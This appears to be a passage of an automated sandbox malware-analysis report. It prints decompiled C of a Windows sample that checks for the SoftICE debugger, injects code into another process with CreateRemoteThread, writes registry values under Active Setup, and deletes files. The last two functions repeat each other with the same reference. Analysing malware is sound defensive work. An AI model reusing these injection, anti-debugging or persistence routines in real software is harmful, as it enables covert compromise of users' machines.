                                    • RegCloseKey.ADVAPI32(00000000,80000001,Software\Microsoft\Active Setup\Installed Components\,00000000,00020006,?,?,?,00406AF1), ref: 00406A0E
                                    Strings
                                    • Software\Microsoft\Active Setup\Installed Components\, xrefs: 004069F0
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseDeleteOpen
                                    • String ID: Software\Microsoft\Active Setup\Installed Components\
                                    • API String ID: 3399588633-1337323248
                                    • Opcode ID: 282679c8ea14fe7c5e13c97754bf3c3aaaeff35f8cdc94346c9d03bd774ac319
                                    • Instruction ID: e40fb9d213039d93dcec3c1e8996a1bef626a17aa7b52359fc93130613ad7c1e
                                    • Opcode Fuzzy Hash: 282679c8ea14fe7c5e13c97754bf3c3aaaeff35f8cdc94346c9d03bd774ac319
                                    • Instruction Fuzzy Hash: FBD0A7B07443003AE110BAD65C83F1B268CC7C8745F10442A7104BB0C2C4789D000579
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 75%
                                    			E00406088(void* __eax, void* __ebx, char __ecx, intOrPtr __edx, void* __esi, void* __eflags, intOrPtr* _a4, char _a8) {
                                    				intOrPtr _v8;
                                    				char _v12;
                                    				void* _v16;
                                    				int _v20;
                                    				int _v24;
                                    				long _t35;
                                    				long _t46;
                                    				intOrPtr _t66;
                                    				void* _t72;
                                    				char* _t73;
                                    				void* _t76;
                                    
                                    				_v12 = __ecx;
                                    				_v8 = __edx;
                                    				_t72 = __eax;
                                    				_t60 = _a4;
                                    				E00401F38(_v8);
                                    				E00401F38(_v12);
                                    				E00401F38(_a8);
                                    				_push(_t76);
                                    				_push(0x406167);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t76 + 0xffffffec;
                                    				E00401B14(_a4, _a8);
                                    				_t35 = RegOpenKeyExA(_t72, E00401F48(_v8), 0, 1,  &_v16); // executed
                                    				if(_t35 == 0) {
                                    					_t73 = E00401F48(_v12);
                                    					_t46 = RegQueryValueExA(_v16, _t73, 0,  &_v20, 0,  &_v24); // executed
                                    					if(_t46 == 0) {
                                    						E00402074(_t60, _v24);
                                    						RegQueryValueExA(_v16, _t73, 0,  &_v20, E00401F48( *_t60),  &_v24); // executed
                                    						E00402074(_t60, _v24 - 1);
                                    					}
                                    					RegCloseKey(_v16); // executed
                                    				}
                                    				_pop(_t66);
                                    				 *[fs:eax] = _t66;
                                    				_push(E0040616E);
                                    				E00401AE4( &_v12, 2);
                                    				return E00401AC0( &_a8);
                                    			}

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00000001,?,00000000,00406167), ref: 004060DD
                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,00406167), ref: 00406101
                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001), ref: 0040612B
                                    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,00406167), ref: 0040613F
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: QueryValue$CloseOpen
                                    • String ID:
                                    • API String ID: 1586453840-0
                                    • Opcode ID: b106ff00d2019447eb815b6a70ce28f6bc541ad976cbeee6ba3fa94798fc6654
                                    • Instruction ID: 0e00d036d103dc2b2ef1cfb5c67197bce49365ef8cbb96d3ced269820940c9d9
                                    • Opcode Fuzzy Hash: b106ff00d2019447eb815b6a70ce28f6bc541ad976cbeee6ba3fa94798fc6654
                                    • Instruction Fuzzy Hash: 3021E075A00109BBDB00EBA9CC82EAE77BCEF49354F504176B914F72D1D778AE058764
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 68%
                                    			E00405D70(intOrPtr __eax, void* __ebx, long __ecx, char __edx, void* __esi, void* __eflags) {
                                    				intOrPtr _v8;
                                    				char _v12;
                                    				long _v16;
                                    				void* _t17;
                                    				void* _t28;
                                    				intOrPtr _t33;
                                    				long _t36;
                                    				void* _t39;
                                    
                                    				_t36 = __ecx;
                                    				_v12 = __edx;
                                    				_v8 = __eax;
                                    				E00401F38(_v8);
                                    				E00401F38(_v12);
                                    				_push(_t39);
                                    				_push(0x405e0a);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t39 + 0xfffffff4;
                                    				_t17 = CreateFileA(E00401F48(_v8), 0x40000000, 2, 0, 2, 0, 0); // executed
                                    				_t28 = _t17;
                                    				if(_t28 != 0xffffffff) {
                                    					if(_t36 == 0xffffffff) {
                                    						SetFilePointer(_t28, 0, 0, 0);
                                    					}
                                    					WriteFile(_t28, E00401F9C( &_v12), _t36,  &_v16, 0); // executed
                                    					CloseHandle(_t28); // executed
                                    				}
                                    				_pop(_t33);
                                    				 *[fs:eax] = _t33;
                                    				_push(E00405E11);
                                    				return E00401AE4( &_v12, 2);
                                    			}
                                    0x00405d78
                                    0x00405d7a
                                    0x00405d7d
                                    0x00405d83
                                    0x00405d8b
                                    0x00405d92
                                    0x00405d93
                                    0x00405d98
                                    0x00405d9b
                                    0x00405db6
                                    0x00405dbb
                                    0x00405dc0
                                    0x00405dc5
                                    0x00405dce
                                    0x00405dce
                                    0x00405de4
                                    0x00405dea
                                    0x00405dea
                                    0x00405df1
                                    0x00405df4
                                    0x00405df7
                                    0x00405e09

                                    APIs
                                    • CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DB6
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DCE
                                    • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DE4
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DEA
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseCreateHandlePointerWrite
                                    • String ID:
                                    • API String ID: 3604237281-0
                                    • Opcode ID: 7dc1bfca9d025d0b83b5e26c46da853ac632ff7e58f76998c26eff8db92b4821
                                    • Instruction ID: 55d088da9265c3b5ae2f525a133c65af5c973924d17bad78a6645e8f940914b1
                                    • Opcode Fuzzy Hash: 7dc1bfca9d025d0b83b5e26c46da853ac632ff7e58f76998c26eff8db92b4821
                                    • Instruction Fuzzy Hash: F1116D70A407047AE720BB75CC83F9F76ACDB05728FA04677B510B62E2DA786E00896C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E00405850() {
                                    				void* _t1;
                                    				void* _t4;
                                    
                                    				_t4 = 0;
                                    				_t1 = CreateFileA("\\\\.\\NTICE", 0xc0000000, 3, 0, 3, 0x80, 0); // executed
                                    				if(_t1 != 0xffffffff) {
                                    					CloseHandle(_t1);
                                    					_t4 = 1;
                                    				}
                                    				return _t4;
                                    			}
                                    0x00405851
                                    0x0040586a
                                    0x00405872
                                    0x00405875
                                    0x0040587a
                                    0x0040587a
                                    0x0040587f

                                    APIs
                                    • CreateFileA.KERNEL32(\\.\NTICE,C0000000,00000003,00000000,00000003,00000080,00000000,00000000,0040589D,00000000,0040B212,00000000,0040BF40,00000000,00000000,00000000), ref: 0040586A
                                    • CloseHandle.KERNEL32(00000000,\\.\NTICE,C0000000,00000003,00000000,00000003,00000080,00000000,00000000,0040589D,00000000,0040B212,00000000,0040BF40,00000000,00000000), ref: 00405875
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateFileHandle
                                    • String ID: \\.\NTICE
                                    • API String ID: 3498533004-2502798147
                                    • Opcode ID: debc4518062f563bffe564e22a037e3d6494d17ef5953f9ebd345af3da82e7ec
                                    • Instruction ID: dcdfadaa743e4582149ecbcd816e92e043e7093f062ec94bd67b511fcc83bcd2
                                    • Opcode Fuzzy Hash: debc4518062f563bffe564e22a037e3d6494d17ef5953f9ebd345af3da82e7ec
                                    • Instruction Fuzzy Hash: 27D0CAB238170039F83438A92C97F1A440C9701B29EA0833ABB20BA1E1C4A8AA29021C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E00405814() {
                                    				void* _t1;
                                    				void* _t4;
                                    
                                    				_t4 = 0;
                                    				_t1 = CreateFileA("\\\\.\\SICE", 0xc0000000, 3, 0, 3, 0x80, 0); // executed
                                    				if(_t1 != 0xffffffff) {
                                    					CloseHandle(_t1);
                                    					_t4 = 1;
                                    				}
                                    				return _t4;
                                    			}
                                    0x00405815
                                    0x0040582e
                                    0x00405836
                                    0x00405839
                                    0x0040583e
                                    0x0040583e
                                    0x00405843

                                    APIs
                                    • CreateFileA.KERNEL32(\\.\SICE,C0000000,00000003,00000000,00000003,00000080,00000000,00000000,00405894,00000000,0040B212,00000000,0040BF40,00000000,00000000,00000000), ref: 0040582E
                                    • CloseHandle.KERNEL32(00000000,\\.\SICE,C0000000,00000003,00000000,00000003,00000080,00000000,00000000,00405894,00000000,0040B212,00000000,0040BF40,00000000,00000000), ref: 00405839
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateFileHandle
                                    • String ID: \\.\SICE
                                    • API String ID: 3498533004-948585333
                                    • Opcode ID: ff68a70177764c28d499507b68599e559ed85a22d0656cccf2f85e6c98713594
                                    • Instruction ID: 3ad54f1ae86a7dc7f46777f6809a8286594d703ee9eb335483981d0cf1385b1e
                                    • Opcode Fuzzy Hash: ff68a70177764c28d499507b68599e559ed85a22d0656cccf2f85e6c98713594
                                    • Instruction Fuzzy Hash: B8D012723C170039F83038A51C97F07400C5701B2DEB08336BB10BD1E1C4F8B619051C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 52%
                                    			E00405A28(char __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                    				char _v8;
                                    				char _v9;
                                    				void* _t13;
                                    				int _t24;
                                    				intOrPtr _t36;
                                    				intOrPtr _t37;
                                    				CHAR* _t40;
                                    				void* _t42;
                                    				void* _t43;
                                    				intOrPtr _t44;
                                    				void* _t45;
                                    
                                    				_t45 = __eflags;
                                    				_t42 = _t43;
                                    				_t44 = _t43 + 0xfffffff8;
                                    				_push(__ebx);
                                    				_v8 = __eax;
                                    				E00401F38(_v8);
                                    				_push(_t42);
                                    				_push(0x405ac7);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t44;
                                    				_v9 = 0;
                                    				_t13 = E00405D04(_v8, __ebx, _t45); // executed
                                    				if(_t13 != 0) {
                                    					_push(_t42);
                                    					_push(0x405aa7);
                                    					_push( *[fs:eax]);
                                    					 *[fs:eax] = _t44;
                                    					_t40 = E00401F48(_v8);
                                    					GetFileAttributesA(_t40);
                                    					SetFileAttributesA(_t40, 0);
                                    					_t24 = DeleteFileA(_t40);
                                    					asm("sbb eax, eax");
                                    					_v9 = _t24 + 1;
                                    					_pop(_t37);
                                    					 *[fs:eax] = _t37;
                                    				}
                                    				_pop(_t36);
                                    				 *[fs:eax] = _t36;
                                    				_push(E00405ACE);
                                    				return E00401AC0( &_v8);
                                    			}
                                    0x00405a28
                                    0x00405a29
                                    0x00405a2b
                                    0x00405a2e
                                    0x00405a31
                                    0x00405a37
                                    0x00405a3e
                                    0x00405a3f
                                    0x00405a44
                                    0x00405a47
                                    0x00405a4a
                                    0x00405a51
                                    0x00405a58
                                    0x00405a5c
                                    0x00405a5d
                                    0x00405a62
                                    0x00405a65
                                    0x00405a70
                                    0x00405a73
                                    0x00405a89
                                    0x00405a8f
                                    0x00405a97
                                    0x00405a9a
                                    0x00405a9f
                                    0x00405aa2
                                    0x00405aa2
                                    0x00405ab3
                                    0x00405ab6
                                    0x00405ab9
                                    0x00405ac6

                                    APIs
                                      • Part of subcall function 00405D04: FindFirstFileA.KERNEL32(00000000,?,00000000,00405D61,?,?,?,00405A56,00000000,00405AC7), ref: 00405D39
                                      • Part of subcall function 00405D04: FindClose.KERNEL32(00000000,00000000,?,00000000,00405D61,?,?,?,00405A56,00000000,00405AC7), ref: 00405D44
                                    • GetFileAttributesA.KERNEL32(00000000,00000000,00405AA7,?,00000000,00405AC7), ref: 00405A73
                                    • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00405AA7,?,00000000,00405AC7), ref: 00405A89
                                    • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00405AA7,?,00000000,00405AC7), ref: 00405A8F
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: File$AttributesFind$CloseDeleteFirst
                                    • String ID:
                                    • API String ID: 996707796-0
                                    • Opcode ID: 407bb1a708abdd117d18c8722254ef02e451320ef10e5c65e09b9235ed18296b
                                    • Instruction ID: 1c4186debc08bb4691b9d877f2086b3288a94b326db33eea14d01e2d90e30b07
                                    • Opcode Fuzzy Hash: 407bb1a708abdd117d18c8722254ef02e451320ef10e5c65e09b9235ed18296b
                                    • Instruction Fuzzy Hash: 52110230324644AED702DB658C12A9F7BECDB0A704F6204BAF400E22D2D67D5E00DA68
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 70%
                                    			E00405C4C(void* __eax, void* __ebx, char __ecx, intOrPtr __edx, void* __esi, void* __eflags, char _a4) {
                                    				intOrPtr _v8;
                                    				char _v12;
                                    				void* _v16;
                                    				int _t28;
                                    				char* _t30;
                                    				long _t34;
                                    				intOrPtr _t49;
                                    				void* _t52;
                                    				void* _t55;
                                    
                                    				_v12 = __ecx;
                                    				_v8 = __edx;
                                    				_t52 = __eax;
                                    				E00401F38(_v8);
                                    				E00401F38(_v12);
                                    				E00401F38(_a4);
                                    				_push(_t55);
                                    				_push(0x405cf1);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t55 + 0xfffffff4;
                                    				RegCreateKeyA(_t52, E00401F48(_v8),  &_v16); // executed
                                    				_t28 = E00401D50(_a4);
                                    				_t30 = E00401F48(_a4);
                                    				_t34 = RegSetValueExA(_v16, E00401F48(_v12), 0, 2, _t30, _t28); // executed
                                    				if(_t34 == 0) {
                                    				}
                                    				RegCloseKey(_v16);
                                    				_pop(_t49);
                                    				 *[fs:eax] = _t49;
                                    				_push(E00405CF8);
                                    				E00401AE4( &_v12, 2);
                                    				return E00401AC0( &_a4);
                                    			}
                                    0x00405c54
                                    0x00405c57
                                    0x00405c5a
                                    0x00405c5f
                                    0x00405c67
                                    0x00405c6f
                                    0x00405c76
                                    0x00405c77
                                    0x00405c7c
                                    0x00405c7f
                                    0x00405c92
                                    0x00405c9a
                                    0x00405ca3
                                    0x00405cba
                                    0x00405cc1
                                    0x00405cc1
                                    0x00405cc9
                                    0x00405cd0
                                    0x00405cd3
                                    0x00405cd6
                                    0x00405ce3
                                    0x00405cf0

                                    APIs
                                    • RegCreateKeyA.ADVAPI32(?,00000000,?), ref: 00405C92
                                    • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000002,00000000,00000000,00000000,00405CF1), ref: 00405CBA
                                    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000002,00000000,00000000,00000000,00405CF1), ref: 00405CC9
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateValue
                                    • String ID:
                                    • API String ID: 1818849710-0
                                    • Opcode ID: 81e061f4a411acf1b47f29db2a0edd4e2ad5688a0781f21f81034fba59ec7b53
                                    • Instruction ID: 4662c72c84a21674aa9b172658a56c38b121d8aad11d412cb7a31c38f5d4d23c
                                    • Opcode Fuzzy Hash: 81e061f4a411acf1b47f29db2a0edd4e2ad5688a0781f21f81034fba59ec7b53
                                    • Instruction Fuzzy Hash: 0611DD70A14608BFDB00EFA9CC82A9E7BACDB05354F50447AF914F72E1D738AE019B58
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E004038AC(void* __eax, void* __ecx, void* __edx, char _a4, long _a8) {
                                    				void* _v8;
                                    				long _v12;
                                    				long _v16;
                                    				void* _t16;
                                    				void* _t23;
                                    				void* _t31;
                                    				void* _t32;
                                    				void* _t33;
                                    
                                    				_v8 = __ecx;
                                    				_t31 = __edx;
                                    				_t23 = __eax;
                                    				_t33 = E0040387C(__eax, _a8, _v8);
                                    				_t16 = CreateRemoteThread(_t23, 0, 0, E0040387C(_t23, E004037DC(__edx), _t31), _t33, 0,  &_v16); // executed
                                    				_t32 = _t16;
                                    				if(_a4 != 0) {
                                    					WaitForSingleObject(_t32, 0xffffffff);
                                    					ReadProcessMemory(_t23, _t33, _v8, _a8,  &_v12);
                                    				}
                                    				return _t32;
                                    			}
                                    0x004038b5
                                    0x004038b8
                                    0x004038ba
                                    0x004038c9
                                    0x004038ea
                                    0x004038ef
                                    0x004038f5
                                    0x004038fa
                                    0x0040390d
                                    0x0040390d
                                    0x0040391a

                                    APIs
                                      • Part of subcall function 0040387C: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,004038C9), ref: 00403892
                                      • Part of subcall function 0040387C: WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,00000000,?,00003000,00000040,?,?,?,?,?,004038C9), ref: 0040389E
                                    • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004038EA
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004038FA
                                    • ReadProcessMemory.KERNEL32(?,00000000,?,?,00000000,00000000,000000FF), ref: 0040390D
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: MemoryProcess$AllocCreateObjectReadRemoteSingleThreadVirtualWaitWrite
                                    • String ID:
                                    • API String ID: 3966641755-0
                                    • Opcode ID: 51aba04c633cb2b561979a642a955c1eb1e5a5082f4e13737333612bceef90ab
                                    • Instruction ID: 98dfc2b63562e43be382328cbb186e20acb4a9321053857b4be2ba9adcb19dad
                                    • Opcode Fuzzy Hash: 51aba04c633cb2b561979a642a955c1eb1e5a5082f4e13737333612bceef90ab
                                    • Instruction Fuzzy Hash: D9018F717001087BD710EA6E8C81FAFBBED8B89325F20857AB518E73C1D974DE0083A8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 60%
                                    			E00406684(intOrPtr __eax, void* __ebx, void* __eflags) {
                                    				intOrPtr _v8;
                                    				char _v12;
                                    				char _v16;
                                    				char _v20;
                                    				int _t55;
                                    				intOrPtr _t70;
                                    				intOrPtr _t83;
                                    
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_v8 = __eax;
                                    				E00401F38(_v8);
                                    				_push(_t83);
                                    				_push(0x406794);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t83;
                                    				if(_v8 != 0) {
                                    					if(E00406660(_v8) != 1) {
                                    						E00401B58( &_v12, _v8);
                                    						if( *((char*)(_v12 + E00401D50(_v12) - 1)) != 0x5c) {
                                    							E00401D58( &_v12, E004067AC);
                                    						}
                                    						while(E0040202C(E004067AC, _v12) - 1 >= 0) {
                                    							E00401FA4(_v12, E0040202C(E004067AC, _v12), 1,  &_v20);
                                    							E00401D58( &_v16, _v20);
                                    							E00401FE4( &_v12, E0040202C(E004067AC, _v12), 1);
                                    							if(E00406660(_v16) != 0) {
                                    								continue;
                                    							} else {
                                    								_t55 = CreateDirectoryA(E00401F48(_v16), 0); // executed
                                    								asm("sbb eax, eax");
                                    								if(_t55 + 1 != 0) {
                                    									continue;
                                    								}
                                    							}
                                    							goto L9;
                                    						}
                                    						E00406660(_v8);
                                    					} else {
                                    					}
                                    				}
                                    				L9:
                                    				_pop(_t70);
                                    				 *[fs:eax] = _t70;
                                    				_push(E0040679B);
                                    				return E00401AE4( &_v20, 4);
                                    			}

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
                                     • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
                                     • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
                                     • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
                                     • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AttributesFile
                                    • String ID:
                                    • API String ID: 3188754299-0
                                    • Opcode ID: c9e28d2c4a69e1a92fb4bc546c22ddd89a9891bb3f9ee0742535c6a6392ef30c
                                    • Instruction ID: 08c8d177f09d8c487563988da865974fd2a5e1b789b45069e99321bb8cea4358
                                    • Opcode Fuzzy Hash: c9e28d2c4a69e1a92fb4bc546c22ddd89a9891bb3f9ee0742535c6a6392ef30c
                                    • Instruction Fuzzy Hash: 76315030A00208AFDB00EBA5C942E9E77B5EF44308F6141BBF102B72E1D77DAE558A58
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E00406660(void* __eax) {
                                    				signed char _t5;
                                    
                                    				_t5 = GetFileAttributesA(E00401F48(__eax)); // executed
                                    				if(_t5 == 0xffffffff || (_t5 & 0x00000010) == 0) {
                                    					return 0;
                                    				} else {
                                    					return 1;
                                    				}
                                    			}

                                    APIs
                                    • GetFileAttributesA.KERNEL32(00000000,00000000,004066BB,00000000,00406794,?,?,00000000,00000000,00000000,00000000), ref: 0040666B
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
                                     • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
                                     • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
                                     • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
                                     • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AttributesFile
                                    • String ID:
                                    • API String ID: 3188754299-0
                                    • Opcode ID: 232d6052807dbe3ee739838454242664567a35a431450d985541483414e2e397
                                    • Instruction ID: fca0ec8dcb75db4ffbb1fbdbb764ae01d2ede40a2229cdd6f6647931c02f8f91
                                    • Opcode Fuzzy Hash: 232d6052807dbe3ee739838454242664567a35a431450d985541483414e2e397
                                    • Instruction Fuzzy Hash: B8C08CE02012000ADE10A9FE0CC1A1A02C80E1437AB602F7BF039F33E2E27F88322028
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 68%
                                     			E00403566(struct _SECURITY_ATTRIBUTES* _a4, void* _a8, CHAR* _a12) {
                                     				CHAR* _t4; // declaration missing in the decompiler output
                                     				void* _t8;
                                     
                                     				_t4 = _a12;
                                     				asm("sbb eax, eax");
                                     				_t8 = CreateMutexA(_a4,  &(_a12[1]) & 0x0000007f, _t4); // executed; bInitialOwner expression as emitted by the decompiler
                                     				return _t8;
                                     			}

                                    APIs
                                    • CreateMutexA.KERNEL32(?,?,?,?,?), ref: 0040357E
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
                                     • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
                                     • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
                                     • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
                                     • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CreateMutex
                                    • String ID:
                                    • API String ID: 1964310414-0
                                    • Opcode ID: 4e517a16085b8900b141571b75f19e29287a41f7ed24e47c7e5cc36522aeb123
                                    • Instruction ID: 72f15282d468185fbe7a0b5f937441395a77a4796b686d6b9836a445fb31a29c
                                    • Opcode Fuzzy Hash: 4e517a16085b8900b141571b75f19e29287a41f7ed24e47c7e5cc36522aeb123
                                    • Instruction Fuzzy Hash: 6ED0127325024CBFC700EEBDCC05DAB33DC9718609B008425B918C7100D139EA508B64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 68%
                                     			E00403568(struct _SECURITY_ATTRIBUTES* _a4, void* _a8, CHAR* _a12) {
                                     				CHAR* _t4; // declaration missing in the decompiler output
                                     				void* _t8;
                                     
                                     				_t4 = _a12;
                                     				asm("sbb eax, eax");
                                     				_t8 = CreateMutexA(_a4,  &(_a12[1]) & 0x0000007f, _t4); // executed; bInitialOwner expression as emitted by the decompiler
                                     				return _t8;
                                     			}

                                    APIs
                                    • CreateMutexA.KERNEL32(?,?,?,?,?), ref: 0040357E
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
                                     • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
                                     • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
                                     • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
                                     • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CreateMutex
